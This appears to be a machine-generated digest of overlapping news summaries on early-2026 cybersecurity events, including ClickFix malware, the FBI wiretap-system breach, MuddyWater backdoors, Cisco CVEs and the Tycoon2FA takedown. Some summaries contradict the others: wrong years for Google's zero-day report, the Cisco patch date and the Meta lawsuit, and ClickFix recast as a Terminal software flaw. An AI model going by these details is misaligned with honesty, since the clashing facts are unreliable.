The White House released President Trump's cybersecurity strategy, emphasizing offensive operations as central to US policy. Developed by the Office of the National Cyber Director, the seven-page document focuses on disrupting adversaries, deregulating industry, and accelerating AI adoption, while also addressing the defense of federal systems and critical infrastructure. This shift prioritizes offensive measures over traditional deterrence, garnering significant attention in the cybersecurity landscape.

The White House released "President Trump’s Cyber Strategy for America," outlining a proactive approach to cybersecurity as a strategic domain. Key pillars include building a cyber workforce, shaping adversary behavior through offensive operations, promoting streamlined regulations, modernizing federal networks with zero-trust and AI, securing critical infrastructure, and sustaining technological superiority in AI and cryptography. The strategy emphasizes collaboration between government and private sectors to enhance resilience against cyber threats.

US President Trump signed an executive order on Friday prioritizing the fight against foreign scams and cybercrime, directing the Attorney General to focus on cyber fraud, ransomware, and phishing. The order mandates a victim restoration program and calls for pressure on foreign governments harboring cybercriminals. Concurrently, a new Cyber Strategy emphasizes public-private partnerships for offensive cyber operations and AI integration in government cybersecurity efforts.

The Trump administration's executive order aims to combat cyber fraud, directing multiple agencies to develop a plan within 120 days to disrupt transnational criminal organizations. A Victim Restoration Program will be established within 90 days to reimburse victims from seized funds. The order emphasizes improved coordination among federal agencies and potential sanctions against countries harboring cybercriminals. The FBI estimates cyber scams cost Americans $12.5 billion annually, highlighting the need for a comprehensive response.

The White House released “President Trump’s Cyber Strategy for America,” emphasizing a coordinated response to cyber threats. The strategy focuses on dismantling malicious networks, pursuing hackers, and imposing sanctions on foreign entities. Key initiatives include protecting AI infrastructure, simplifying cyber regulations, and modernizing federal information systems with best practices like zero-trust architecture. The strategy highlights the importance of a skilled cybersecurity workforce and warns that actions against U.S. interests will have consequences.

A new national cyber strategy was released by the Trump Administration on March 6, 2026, focusing on enhancing US digital defenses and countering cyber threats. It outlines six policy pillars: shaping adversary behavior, modernizing federal networks, protecting critical infrastructure, and expanding the cybersecurity workforce. Experts emphasize the need for a budget and effective implementation mechanisms to support these priorities. The strategy aims for proactive measures, including offensive operations and private sector collaboration, to deter cyber attacks.

The Trump administration plans to establish an interagency body to address cyber threats, led by National Cyber Director Sean Cairncross. This initiative includes pilot programs for securing critical infrastructure in specific states and aims to enhance collaboration between government agencies like the DOJ, FBI, and Pentagon. Cairncross emphasized the need for private sector engagement and resource allocation. Additionally, there are plans for an academy to address cybersecurity workforce shortages and initiatives to foster innovation through a foundry and accelerator.

President Trump has unveiled the National Cyber Strategy, outlining plans to combat cybercrime through six pillars: shaping adversary behavior, promoting common-sense regulation, modernizing federal networks, securing critical infrastructure, sustaining superiority in AI, and building cyber talent. The strategy emphasizes proactive responses to cyber threats, including potential real-world actions. It aims to enhance cybersecurity practices, reduce reliance on foreign technology, and foster innovation within the US.

The White House's National Cyber Strategy emphasizes offensive cyber actions against criminal networks and adversarial governments while pledging to reduce cybersecurity regulations. It aims to enhance federal defenses, incentivize private sector collaboration, and elevate cybersecurity in leadership. The strategy includes pilot programs for critical infrastructure and focuses on securing AI technologies. National Cyber Director Sean Cairncross highlighted the need for a unified cyber workforce strategy and indicated future documents detailing action items are forthcoming.

The Trump administration is initiating pilot programs to test cybersecurity technologies in critical infrastructure sectors, including the water sector in Texas, the beef industry in South Dakota, and rural hospitals. National Cyber Director Sean Cairncross emphasized the need for rapid deployment of effective solutions tailored to specific states and industries, rather than a one-size-fits-all approach. The administration is inviting states and businesses to participate in these pilot programs.

Mozilla's Firefox has enhanced security through collaboration with Anthropic's AI, which identified 14 high-severity bugs, resulting in 22 CVEs being issued and fixed. However, about 10-15% of Firefox crashes are attributed to hardware issues like bit flips, often caused by faulty memory. Mozilla received 470,000 crash reports, with 25,000 potentially linked to these memory errors. While AI aids in vulnerability detection, hardware errors remain outside Mozilla's control, highlighting ongoing risks in device reliability.

Anthropic discovered 22 vulnerabilities in Firefox, including 14 high-severity, during a partnership with Mozilla. The vulnerabilities were identified in January 2026 and addressed in Firefox 148. Notably, a use-after-free bug was found in just 20 minutes. The AI model, Claude Opus 4.6, was more effective at finding vulnerabilities than exploiting them, successfully creating exploits for only two out of hundreds of tests. Mozilla reported that this AI-assisted approach has led to the discovery of 90 additional bugs, enhancing security analysis.

Anthropic's Claude Opus 4.6 identified 22 vulnerabilities in Firefox, primarily high-severity, which were addressed in Firefox 148 released in January 2026. The AI model demonstrated rapid detection capabilities, finding 112 unique reports across nearly 6,000 C++ files. While it struggled to exploit vulnerabilities, successfully creating functional exploits in only two cases, this highlights the potential risks of AI in offensive security. Mozilla noted that AI-assisted analysis has uncovered 90 additional bugs, emphasizing its growing role in security.

Anthropic's Claude Opus 4.6 identified 22 security flaws in Mozilla's Firefox, with 14 classified as high severity. The analysis, conducted over two weeks, scanned nearly 6,000 C++ files. Mozilla addressed most vulnerabilities in Firefox 148, with others slated for future releases. Anthropic claims Opus 4.6 demonstrates accelerated vulnerability detection, reasoning about code similarly to human researchers, and finding issues without specialized tools.

A fraudulent website impersonating CleanMyMac is tricking macOS users into installing SHub Stealer, a credential-stealing malware. Victims are instructed to run a Terminal command that bypasses macOS protections. The malware avoids Russian devices and collects system information, while also prompting users for their system password under false pretenses. It modifies cryptocurrency wallets to steal recovery phrases and installs a persistent task for ongoing communication with attackers. Users are advised to download software only from official sources.

A fake CleanMyMac utility is spreading SHub infostealer malware targeting macOS users. The campaign involves a spoofed website that tricks users into executing terminal commands to install the malware, bypassing standard protections. SHub steals credentials, crypto wallet data, and establishes persistence by replacing legitimate apps with malicious versions. It also installs a LaunchAgent to allow remote command execution on the infected Mac.

A fake website, cleanmymacos[.]org, is distributing the SHub Stealer malware, targeting macOS users. This malware harvests sensitive data, including passwords and cryptocurrency wallet files. It uses a method called ClickFix to bypass macOS defenses. SHub uniquely backdoors popular cryptocurrency wallets like Exodus and Trezor Suite, exfiltrating credentials to a specific endpoint. Users who interacted with the site should delete malicious files and change passwords immediately.

Microsoft warns of a ClickFix campaign exploiting Windows Terminal to deliver Lumma Stealer malware through social engineering. Discovered in February 2026, attackers guide users to launch Terminal using Windows + X → I, bypassing traditional detection methods. Users are tricked into executing hex-encoded commands that download and execute malicious payloads, leading to credential theft from browsers. Microsoft Defender provides guidance on defending against this campaign.

A new ClickFix scam targets Windows users by tricking them into launching Windows Terminal and executing a malicious command that installs the Lumma infostealer. This campaign, identified by Microsoft Threat Intelligence, began in February and uses social engineering tactics to convince users to paste commands under the guise of troubleshooting. The attack can establish persistence, modify Microsoft Defender settings, and steal credentials from browsers like Chrome and Edge.

A new ClickFix attack exploits Windows Terminal to execute malicious payloads. This attack takes advantage of vulnerabilities in the terminal application, allowing attackers to bypass security measures and execute arbitrary code. Organizations are advised to update their Windows Terminal software to the latest version to mitigate risks. Monitoring for unusual terminal activity and implementing strict access controls are also recommended to enhance security against such threats.

Threat actors are employing a new tactic in ClickFix phishing attacks, as reported by Microsoft. Instead of instructing victims to use the Run dialog, they now direct them to use the Windows + X → I shortcut to open Windows Terminal (wt.exe). Once opened, victims are prompted to paste malicious PowerShell commands via fake CAPTCHA pages or other deceptive prompts that seem routine. This method aims to evade detection and successfully install malware on the victim's system.

Microsoft has issued a warning regarding the evolving ClickFix campaign, which now targets Windows Terminal to trick users into installing Lumma Stealer malware. This campaign, observed since February 2026, involves victims being directed to malicious websites displaying fake security warnings. Unlike previous methods using the Windows Run program, attackers now utilize Windows Terminal to execute commands that lead to malware installation, exfiltrating sensitive data from compromised systems.

Hackers have breached FBI networks, impacting a system for managing wiretaps and foreign intelligence surveillance warrants. The FBI confirmed it identified and addressed suspicious activities but provided limited details. This incident adds to a series of significant breaches involving U.S. government agencies, including previous attacks by Chinese and Russian hackers on various organizations. The FBI also reported that the Chinese hacking group Salt Typhoon has compromised at least 200 U.S. companies, including major telecom providers.

The FBI is investigating a potential cyberattack on its Digital Collection System Network, which supports wiretaps and intelligence collection. The breach was discovered on February 17, following irregular network behavior. The White House, DHS, and NSA are now involved. The FBI reported that threat actors accessed the system via an internet service provider vendor. Although the system is unclassified, it contains sensitive investigative information. The incident is part of a broader trend of breaches affecting federal law enforcement systems.

The FBI is investigating a cyber-incident affecting its wiretap and surveillance systems, confirming suspicious activity on its internal networks. While specific details were not disclosed, reports indicate that the breach involved systems managing wiretapping and foreign intelligence surveillance warrants. Media speculation points to the Chinese group Salt Typhoon as a potential actor, known for previous high-level cyber-espionage against U.S. telecommunications providers.

The FBI has reported a suspected incident involving unauthorized access to a network managing wiretaps and foreign intelligence surveillance warrants. The agency confirmed it identified and addressed suspicious activities on its networks, utilizing all technical capabilities for response. Concerns arise that this incident may be linked to state-sponsored actors, particularly given previous warnings about attacks from the Chinese ransomware group, Ghost, targeting US organizations.

The FBI is investigating a breach involving its wiretap and critical surveillance systems, which may have compromised sensitive information. The incident raises concerns about the security of law enforcement tools and the potential for unauthorized access to surveillance data. The FBI has not disclosed specific details about the attack or the extent of the breach, but it emphasizes the importance of safeguarding its systems against cyber threats. Further updates are expected as the investigation continues.

The FBI is investigating suspicious cyber activity on an internal system managing sensitive surveillance data, initiated on February 17, 2026. The unclassified system contains law enforcement sensitive information, including pen register data and personally identifiable information. The FBI confirmed addressing the suspicious activities using technical capabilities but did not disclose further details or identify the attackers, who employed sophisticated techniques, potentially linked to foreign espionage efforts.

The FBI is investigating a breach affecting its wiretapping and surveillance systems, identified on February 17. The unclassified system contained sensitive law enforcement information, including personally identifiable information. The breach is linked to China's Salt Typhoon group, known for hacking U.S. telecommunications. Europol recently dismantled the Tycoon2FA phishing platform, which facilitated extensive phishing attacks, and the LeakBase data marketplace. LastPass warned users of a phishing campaign mimicking internal emails.

Salt Typhoon, a hacking group linked to China, has targeted major telecom and internet companies globally, stealing tens of millions of phone records, including communications of senior U.S. officials. Affected organizations include AT&T, Verizon, CenturyLink, and Viasat. The group has compromised networks in the U.S., Canada, Brazil, and various Asian and European countries, focusing on Cisco routers. The FBI has urged the use of end-to-end encrypted messaging due to the risks posed by these hacks.

The ASPR has introduced a new cybersecurity module in the RISC 2.0 Toolkit to aid health organizations in identifying critical gaps and prioritizing risk mitigation investments. Healthcare leaders highlighted cloud threats, quantum computing risks, and attacks on connected products as areas of concern. The module aligns with NIST CSF 2.0 and HHS Cybersecurity Performance Goals, allowing users to assess cyber risks alongside other hazards. RISC 2.0 is a free tool already utilized by over 3,500 health systems.

The HHS released an updated Risk Identification and Site Criticality (RISC) toolkit, incorporating a new cybersecurity module to help healthcare organizations assess their cyber risk and resilience. This tool aligns with the NIST Cybersecurity Framework and HHS Cybersecurity Performance Goals. Over 3,500 organizations are using RISC, which allows for self-assessments and reports on preparedness against cyberattacks and other crises. The update comes amid rising ransomware threats in the healthcare sector.

The Department of Health and Human Services released an updated Risk Identification and Site Criticality (RISC) toolkit, incorporating new cybersecurity guidance to help healthcare organizations assess risks and strengthen resilience. The toolkit aligns with the NIST Cybersecurity Framework and HHS Cybersecurity Performance Goals. Over 3,500 organizations currently use RISC, which allows for self-assessments to evaluate preparedness against cyberattacks and other crises, addressing vulnerabilities in legacy systems amid rising ransomware threats.

Iranian hacking group MuddyWater has targeted U.S. networks, including banks and airports, embedding a new backdoor called Dindoor, leveraging the Deno JavaScript runtime. The campaign began in early February, coinciding with military tensions. Data exfiltration attempts were made using Rclone. A separate Python backdoor, Fakeset, was also found. The Canadian Centre for Cyber Security warns of potential retaliatory attacks against critical infrastructure. Organizations are advised to enhance cybersecurity measures and remain vigilant.

An Iran-linked APT group, Seedworm, has targeted multiple US organizations since early February 2026, including a bank, an airport, and non-profits, using new backdoors named Dindoor and Fakeset. These backdoors are linked to espionage efforts, with attempts to exfiltrate data to cloud storage. Researchers noted the group's extensive targeting of various organizations and exploitation of multiple CVEs. An exposed VPS revealed insights into Seedworm's operations, showcasing their adaptability and broad operational scope.

Iranian hacking group MuddyWater has targeted several US firms, including a bank and an airport, using a new backdoor named 'Dindoor.' Detected by Broadcom's Symantec and Carbon Black, the campaign began in early February. The Dindoor backdoor, leveraging Deno, was found on networks of affected organizations, with attempts to exfiltrate data noted. A Python backdoor called Fakeset was also discovered at the airport. Both backdoors were signed with certificates linked to MuddyWater, indicating ongoing threats to other organizations.

Iran-linked APT MuddyWater has targeted U.S. organizations since February 2026, deploying a new backdoor named Dindoor across sectors such as banking, airports, and nonprofits. The malware, relying on the Deno runtime, was signed with a certificate linked to “Amy Cherne.” Victims include a U.S. bank and a defense software supplier in Israel. Researchers noted attempts to exfiltrate data using Rclone. The campaign reflects Iran's strategy of using cyber operations for disruption and espionage against perceived adversaries.

Iran's MuddyWater hackers have targeted multiple U.S. organizations since February 2026, employing a new backdoor malware called Dindoor for stealthy access and data collection. The group, linked to Iran's Ministry of Intelligence, uses phishing and social engineering to infiltrate networks, often leveraging stolen credentials and legitimate tools for lateral movement. Despite geopolitical tensions, their operations persist, emphasizing the need for employee training on recognizing cyberattack tactics to mitigate risks.

State-linked actors, including the Iran-linked APT group Seedworm (Muddy Water), have intensified cyberattacks against U.S. networks since late February amid escalating conflict with Iran. Targeted entities include a U.S. bank, a defense software firm, a U.S.-Canadian NGO, and a U.S. airport. Researchers discovered a new backdoor, Dindoor, leveraging Deno for execution. Data exfiltration attempts were made using RClone. Pro-Iranian hacktivists also claimed responsibility for hacking personal data in Pennsylvania.

Iranian APT group Seedworm has been targeting U.S. critical infrastructure since February 2026, following military strikes on Iran. The group, linked to Iran's MOIS, has infiltrated networks of a U.S. bank, airport, and a defense-related software company. New backdoors Dindoor and Fakeset were identified, with attempts to exfiltrate data using Rclone. The UK’s NCSC warns of ongoing cyber capabilities despite domestic disruptions in Iran. Recommendations include enforcing multi-factor authentication and monitoring outbound data transfers.

Fitch Ratings warns that the U.S. and Israeli bombing campaign against Iran increases cyber risks for U.S. public finance issuers, with potential attacks from hacktivists and state-sponsored groups targeting critical infrastructure. Vulnerable sectors include 28 health organizations and 13 energy companies. The Islamic Revolutionary Guard Corps has previously targeted U.S. water utilities. The current conflict has heightened threats, with actors like MuddyWater already positioned on U.S. networks.

Iranian government-backed operatives, particularly linked to the Ministry of Intelligence and Security (MOIS), are increasingly utilizing cybercrime tools, including malware and ransomware, to further state objectives. Check Point Research highlights connections between groups like MuddyWater and Void Manticore with criminal organizations. Recent activities include the use of the Rhadamanthys infostealer in phishing campaigns targeting Israeli entities and a new backdoor, DinDoor, in espionage operations. The report emphasizes the obfuscation tactics employed by these groups, complicating attribution efforts.

Iran's cyber activities have intensified amid escalating regional conflict, with increased hacktivist mobilization, phishing campaigns, and data theft claims. Key Iranian APT groups, including MuddyWater and APT35, are targeting U.S. and allied interests, employing tactics like DDoS attacks and website defacements. Critical infrastructure is particularly vulnerable, with claims of intrusions into energy sectors. Organizations should monitor for phishing attempts, unusual authentication patterns, and reconnaissance activities to bolster defenses.

In 2025, Google reported that 48% of tracked zero-day vulnerabilities targeted enterprise technologies, a record high. Key affected vendors included Cisco, Fortinet, Ivanti, and VMWare, with common flaws like input validation exploited to breach defenses. Notably, the Clop gang compromised Oracle E-Business Suite, affecting organizations like Harvard and The Washington Post. The report also indicated a rise in zero-days attributed to surveillance vendors, reflecting a shift in government hacking tool access.

In 2025, Google tracked 90 zero-day vulnerabilities, with 43 targeting enterprise software, marking a rise in exploitation by China-linked cyber-espionage groups. Security and networking devices were most affected, with 21 enterprise-related zero-days. Notably, commercial surveillance vendors (CSVs) accounted for 15 zero-days, surpassing traditional state-sponsored groups. Microsoft had the highest number of exploited zero-days, followed by Google and Apple. The report highlights a shift towards targeting larger organizations for espionage.

In 2023, Google identified 90 zero-day vulnerabilities, with Chinese cyberespionage groups doubling their exploits. Commercial surveillance vendors surpassed state-sponsored hackers in targeting. Nearly half of the zero-days affected enterprise technologies, including security appliances, VPNs, and software platforms. The Google Threat Intelligence Group noted a critical risk from trusted edge infrastructure and highlighted the increasing exploitation of interconnected enterprise software, which accounted for 48% of zero-days last year.

Google's GTIG reported 90 zero-day vulnerabilities exploited in 2025, an increase from 78 in 2024, with 48% targeting enterprise technologies. Operating systems were the most exploited, with 39 flaws, while browser exploits fell below 10%. Commercial surveillance vendors surpassed state-sponsored groups in zero-day usage. Major tech vendors and security companies were frequent targets. Google anticipates AI will enhance both threat actor capabilities and defensive measures in 2026.

Enterprise tech firms faced significant zero-day exploit pressure in 2025, with 50% of the 90 tracked exploits targeting them. Microsoft was the most affected, with 25 zero-days, followed by Google (11) and Apple (8). Security applications and networking software were primary targets, with 23% of exploits aimed at these systems. Notably, commercial spyware vendors led zero-day attacks, surpassing state-sponsored groups, with 15 exploits linked to them compared to 12 attributed to state actors.

On March 5, Google Threat Intelligence Group reported a record high of 90 zero-day vulnerabilities in enterprise software for 2025, up from 78 in 2024 but down from 100 in 2023. Notably, 43 (48%) of these targeted enterprise software and appliances, indicating a shift in attacker focus. Among these, 21 targeted security and networking solutions, which are critical for unauthorized access and often overlooked by defenders. This trend highlights the increasing exploitation of enterprise infrastructure by cyber attackers.

In 2025, 90 zero-day vulnerabilities were exploited, with nearly half targeting enterprise-grade technology, according to Google Threat Intelligence Group. State-sponsored groups, particularly China-nexus actors, were responsible for at least 10 zero-days, including CVE-2025-21590 affecting Juniper MX routers. Notably, commercial surveillance vendors were involved in over one-third of attacks, surpassing state-sponsored groups. The report highlights AI's growing role in accelerating threat activities and vulnerability exploitation.

Google's Threat Intelligence Team reported tracking 90 zero-day vulnerabilities exploited in 2025, a decrease from 100 in 2023 but an increase from 78 in 2024. The report indicates a significant rise in enterprise-targeted exploits, which accounted for 48% of all zero-days. AI is expected to enhance both attack and defense capabilities, with attackers automating processes. Google advises defenders to prepare for inevitable compromises and suggests proactive measures for identifying and patching vulnerabilities.

Cisco has confirmed exploitation of two vulnerabilities in Catalyst SD-WAN Manager (CVE-2026-20128 and CVE-2026-20122) patched in February 2025. CVE-2026-20128 allows local attackers with valid credentials to gain DCA user privileges, while CVE-2026-20122 enables remote attackers to overwrite files and gain vmanage user privileges. Cisco recommends upgrading to fixed software. Additionally, 48 vulnerabilities were fixed in Cisco Secure Firewall, including two critical flaws (CVE-2026-20079 and CVE-2026-20131).

Cisco has confirmed active exploitation of two vulnerabilities in Catalyst SD-WAN Manager: CVE-2026-20122 (CVSS 7.1), allowing authenticated attackers to overwrite files, and CVE-2026-20128 (CVSS 5.5), enabling local attackers to gain DCA user privileges. Patches were released for various versions. Users are urged to update software, secure appliances, disable unnecessary services, change default passwords, and monitor log traffic. This follows a recent disclosure of a critical flaw (CVE-2026-20127, CVSS 10.0) exploited by a sophisticated actor.

Cisco has reported active exploitation of two vulnerabilities in its Catalyst SD-WAN Manager software: CVE-2026-20122 (CVSS 7.1) allows authenticated remote attackers to overwrite files, while CVE-2026-20128 (CVSS 5.5) enables local attackers to gain Data Collection Agent privileges. Cisco urges customers to upgrade to fixed software releases. This warning follows prior alerts about vulnerabilities CVE-2022-20775 and CVE-2026-20127, which are also under active attack by sophisticated threat actors.

Cisco warns of active exploitation of two recently patched Catalyst SD-WAN vulnerabilities, CVE-2026-20128 and CVE-2026-20122. These flaws allow attackers to gain root privileges and access sensitive information. Security patches were released on February 25, 2026. The vulnerabilities affect all Cisco Catalyst SD-WAN deployments. Cisco advises immediate updates to mitigate risks. The exploitation is linked to a sophisticated threat actor, tracked as UAT-8616, active since at least 2023.

Britain's ICO is investigating Meta's AI-powered smart glasses after reports that contractors reviewing footage captured private moments of users. The investigation, prompted by Swedish media, revealed that workers in Nairobi reviewed videos showing intimate scenes and personal information. The ICO expressed concern over data protection compliance under GDPR, emphasizing the need for transparency in data collection and usage. Meta stated that recordings are used to improve AI systems and can be managed by users.

Meta is facing a lawsuit filed on March 4, 2023, in the U.S. after a Swedish investigation revealed that overseas subcontractor workers may have accessed user-recorded footage from Meta's Ray-Ban smart glasses. The findings raise significant privacy concerns regarding how these recordings are handled and whether users were adequately informed about the potential review of their intimate footage.

Meta's smart AI glasses, developed with Ray-Ban, face scrutiny after reports revealed that intimate images and videos captured by users were accessed by outsourced workers for content labeling. An investigation highlighted privacy concerns, including unauthorized recordings in private settings. The Information Commissioner’s Office is questioning Meta's data processing transparency and compliance with UK regulations. Meta claims to have privacy protections, but concerns persist about user consent and data handling practices.

Meta's AI smart glasses, developed with Ray-Ban, face scrutiny over privacy issues after reports revealed that intimate images and videos captured by users were viewed by outsourced workers at a third-party firm, Sama. The Information Commissioner’s Office (ICO) is investigating whether Meta adequately communicates data processing practices to users. Concerns include unauthorized recordings and the handling of sensitive imagery. Meta claims to have privacy protections in place, but the investigation raises significant questions about user consent and data transparency.

Cisco has issued a critical advisory regarding a vulnerability in its Secure Firewall Management Center (FMC) Software, tracked as CVE-2026-20079. This flaw allows unauthenticated remote attackers to bypass authentication and execute scripts, gaining full root access. The vulnerability, with a CVSS score of 10.0, requires immediate attention. No workarounds exist; Cisco urges organizations to upgrade to fixed software versions. The advisory was published on March 4, 2026, following discovery by researcher Brandon Sakai.

Cisco released 25 security advisories on March 4, addressing 48 vulnerabilities in its Secure Firewall ASA, FMC, and FTD products. The most critical flaws, CVE-2026-20079 and CVE-2026-20131, both rated 10 CVSS, allow for authentication bypass and remote code execution, respectively. No workarounds exist; customers are urged to upgrade to the patched software. Additionally, 15 high-severity (CVSS 7.2-8.6) and 31 medium-severity (CVSS 4.3-6.8) vulnerabilities were also patched.

Cisco has issued a security advisory for a critical vulnerability in its Secure Firewall Management Center (FMC) software, rated CVSS 10.0. This flaw allows remote, unauthenticated attackers to execute arbitrary code, gaining root-level control. It arises from insecure deserialization in the web interface. Affected systems include Cisco Secure FMC and Cisco Security Cloud Control, while ASA and FTD software are not vulnerable. No workarounds exist; organizations must apply updates to mitigate risks. Prompt remediation is essential.

Cisco disclosed two critical vulnerabilities in its firewall management software, CVE-2026-20079 and CVE-2026-20131, which could allow unauthenticated remote attackers to gain root access to affected devices. CVE-2026-20079 enables script execution via an authentication bypass, while CVE-2026-20131 is a deserialization flaw allowing remote code execution. Cisco urges customers to upgrade to patched software, as there are no workarounds. The vulnerabilities were part of a biannual update addressing 48 issues across multiple products.

Cisco released emergency patches on March 4, 2026, addressing 25 security advisories and 48 CVEs for its firewall products. Notably, two critical vulnerabilities in the Secure Firewall Management Center (FMC) Software, CVE-2026-20079 (authentication bypass) and CVE-2026-20131 (insecure deserialization), both received maximum CVSS scores of 10. This update represents one of the largest patching efforts for Cisco's firewall products.

Cisco has released security updates for 48 vulnerabilities across its firewall platforms, including Cisco Secure Firewall Adaptive Security Appliance and Management Center. Notably, two critical flaws (CVE-2026-20079 and CVE-2026-20131) have a CVSS score of 10, allowing for authentication bypass and remote code execution, respectively. Cisco recommends immediate upgrades to patched software versions, as there are no temporary fixes. The advisory also includes 15 high-severity and 31 medium-severity vulnerabilities.

Tycoon2FA, a phishing-as-a-service platform launched in August 2023, has enabled extensive phishing campaigns targeting over 500,000 organizations monthly. Developed by Storm-1747, it allows attackers to bypass multifactor authentication (MFA) using adversary-in-the-middle techniques. The service has been disrupted by Microsoft and Europol. Tycoon2FA employs sophisticated evasion tactics, including custom CAPTCHAs and dynamic redirects, making detection challenging. Recommendations include adopting phishing-resistant MFA and utilizing Microsoft Defender for threat detection and response.

Microsoft, Europol, and partners dismantled the Tycoon 2FA phishing-as-a-service platform, seizing 330 domains used for credential theft and MFA bypass. Active since 2023, it accounted for 62% of phishing attempts blocked by Microsoft, impacting over 500,000 organizations globally. The operation disrupted a surge in phishing activity, dropping messages by 57.6% post-seizure. Recommendations include deploying phishing-resistant MFA, monitoring for anomalies, and joining ISACs for shared intelligence.

A global coalition led by Microsoft dismantled the Tycoon 2FA phishing kit on Wednesday, seizing 330 domains linked to its infrastructure. Tycoon 2FA, operational since August 2023, was responsible for over 30 million phishing messages monthly, targeting more than 500,000 organizations, particularly in education and healthcare. Microsoft and Health-ISAC filed a civil complaint against its creator, seeking a $10 million injunction. The operation involved authorities from six countries and multiple security firms.

The Tycoon2FA phishing service infrastructure has been dismantled through a coordinated effort led by Microsoft and Europol, involving multiple law enforcement agencies. A US court order enabled Microsoft to seize 330 active domains associated with Tycoon2FA, which was a significant tool for bypassing multifactor authentication. Law enforcement in Latvia, Lithuania, Portugal, Poland, Spain, and the UK also participated in seizing the service's infrastructure, temporarily disrupting this major phishing operation.

Europol-led efforts dismantled Tycoon 2FA, a major phishing-as-a-service toolkit linked to over 64,000 attacks, impacting nearly 100,000 organizations globally. The service, operational since August 2023, facilitated adversary-in-the-middle credential harvesting, generating millions of phishing emails monthly. Key features included a web-based panel for campaign management and real-time data capture. The operation resulted in the takedown of 330 domains supporting the service, which targeted various sectors, including education and healthcare.

Authorities have disrupted Tycoon 2FA, a phishing-as-a-service platform active since August 2023, which enabled cybercriminals to bypass multi-factor authentication (MFA). At its peak, it accounted for 62% of phishing attempts blocked by Microsoft. Investigators took down 330 domains linked to the service, which generated tens of millions of phishing emails monthly and affected nearly 100,000 organizations globally, including schools and hospitals. The operation was coordinated by Europol with support from Microsoft and law enforcement across several countries.

Europol led a multinational operation to dismantle Tycoon 2FA, a major phishing-as-a-service platform active since August 2023. The operation involved police from several countries and resulted in the seizure of 330 domains used for phishing. Tycoon 2FA enabled unauthorized access to nearly 100,000 organizations, generating tens of millions of phishing emails monthly. The platform, which utilized adversary-in-the-middle attacks, reportedly earned over $400,000 in cryptocurrency before its takedown.

International law enforcement has dismantled the Tycoon 2FA phishing-as-a-service platform, which targeted over 500,000 accounts, including those of hospitals and schools. Authorities seized 330 domains used for phishing operations. Active since 2023, Tycoon 2FA sent tens of millions of phishing emails monthly and was responsible for 62% of phishing attempts blocked by Microsoft. The platform allowed attackers to bypass multi-factor authentication, leading to operational disruptions in healthcare and education sectors.

A coordinated international operation led by Europol has dismantled the Tycoon 2FA phishing platform, which enabled large-scale credential theft by bypassing multi-factor authentication. The operation seized around 330 domains and disrupted the infrastructure used for phishing campaigns targeting over 500,000 organizations. Tycoon 2FA utilized adversary-in-the-middle phishing, capturing session tokens to maintain access. The platform, which emerged in August 2023, was linked to tens of millions of phishing emails monthly.

An international coalition led by Microsoft and Europol has dismantled the Tycoon 2FA phishing platform, which compromised over 96,000 victims globally since 2023, including more than 55,000 Microsoft customers. A U.S. court ordered the seizure of 330 domains supporting Tycoon 2FA's operations. The platform harvested credentials from Gmail and Microsoft 365 accounts, significantly impacting businesses and healthcare providers, with Health-ISAC reporting severe operational disruptions in medical facilities.

Iran-linked hackers are exploiting critical vulnerabilities in IP cameras, specifically targeting Hikvision and Dahua products since late February. Key flaws include CVE-2023-6895 and CVE-2025-34067 in Hikvision's Intercom Broadcasting System, and CVE-2021-33044 in certain Dahua devices. The attacks have primarily affected countries in the Persian Gulf and Middle East, with a noted connection to prior conflicts involving Israel and Iran. The hackers are linked to the Islamic Revolutionary Guard Corps (IRGC).

Multiple Iranian hacking crews have targeted internet-connected surveillance cameras in Israel and other Middle Eastern countries since February 28, exploiting vulnerabilities in Hikvision and Dahua products. Check Point researchers identified hundreds of attempts, linking them to potential physical attacks. Key vulnerabilities include CVE-2017-7921, CVE-2021-36260, CVE-2023-6895, CVE-2025-34067, and CVE-2021-33044. Recommendations include updating firmware, removing WAN access, and isolating cameras on dedicated VLANs.

Threat actors are increasingly targeting IP cameras in the Middle East, exploiting vulnerabilities amid ongoing regional conflicts. The attacks aim to gain unauthorized access to surveillance systems, potentially compromising sensitive information and security operations. Organizations are urged to enhance their security measures, including updating firmware, changing default passwords, and implementing network segmentation to protect against these threats.

A spike in scanning for internet-exposed security cameras in Israel and the Middle East has been linked to an Iranian hacking group amid military tensions. The scans targeted Hikvision and Dahua cameras, aiming to exploit vulnerabilities for reconnaissance during missile strikes. Similar tactics were noted in past conflicts, indicating a trend in using hacked cameras for military intelligence. Security experts recommend securing these devices to mitigate risks associated with their exploitation.

Check Point's research reveals hundreds of hacking attempts targeting consumer-grade security cameras in the Middle East, linked to Iranian military activities amid escalating tensions. The attacks exploited five vulnerabilities in Hikvision and Dahua cameras, which had been previously patched. The attempts coincided with US and Israeli air strikes on Iran, with Check Point attributing the efforts to Iranian hacker groups, including Handala, associated with Iran's Ministry of Intelligence and Security.

Iran-linked hackers have targeted IP cameras in Israel and Gulf states for military intelligence, as reported by Check Point on March 7, 2026. Attacks focused on vulnerabilities in Hikvision and Dahua cameras, including CVE-2017-7921 and CVE-2021-33044. The activity surged around geopolitical tensions, with reconnaissance efforts noted during conflicts. Recommendations include securing cameras behind VPNs, changing default passwords, and monitoring for suspicious activity to mitigate risks.

A newly identified malware campaign named "BadPaw" targets Ukraine, utilizing a Ukrainian email service for credibility. The attack begins with an email link that redirects victims to a tracking pixel before delivering a disguised HTA application. The malware checks the system's installation date to avoid detection and uses a scheduled task for persistence. It connects to a C2 server to deploy a backdoor, "MeowMeowProgram[.]exe," featuring multiple defensive layers and Russian-language strings, suggesting a possible Russian developer.

Cybersecurity researchers have uncovered a Russian cyber campaign targeting Ukrainian entities, deploying two new malware families: BadPaw and MeowMeow. The attack begins with a phishing email leading to a ZIP file containing an HTA file that displays a decoy document while executing malicious actions. BadPaw, a .NET loader, fetches the MeowMeow backdoor, which can execute PowerShell commands and manipulate files. The campaign is attributed to APT28, based on targeting patterns and language used in the malware.

A Russian cyberespionage campaign targets Ukrainian entities using new malware families BadPaw and MeowMeow, delivered via phishing emails. The attack begins with a ZIP archive containing an HTA file that lures victims with a decoy document about border crossing appeals. BadPaw, a .NET loader, establishes C2 communication to deploy the MeowMeow backdoor. Both malware strains utilize obfuscation techniques to evade detection, and the campaign is attributed to a Russia-linked group, likely APT28, based on targeting and tactics.

The FBI, in collaboration with international law enforcement, has seized the cybercriminal forum LeakBase, known for trading stolen databases, under “Operation Leak.” The domains now redirect to an FBI seizure banner. Legal actions were based on U.S. and German court orders. All user data, including accounts and IP logs, have been secured for evidence. Authorities encourage former users to report to a dedicated tip-line. This operation significantly impacts the data-leak forum ecosystem.

